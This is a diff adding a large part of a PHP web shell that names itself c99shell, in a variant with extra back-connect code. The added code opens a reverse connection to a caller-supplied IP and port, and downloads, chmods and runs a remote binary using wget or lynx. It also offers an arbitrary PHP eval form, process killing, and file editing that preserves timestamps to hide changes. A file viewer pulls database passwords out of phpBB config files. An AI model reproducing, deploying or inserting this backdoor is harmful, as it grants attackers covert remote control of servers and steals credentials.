+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "</a>&nbsp;&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
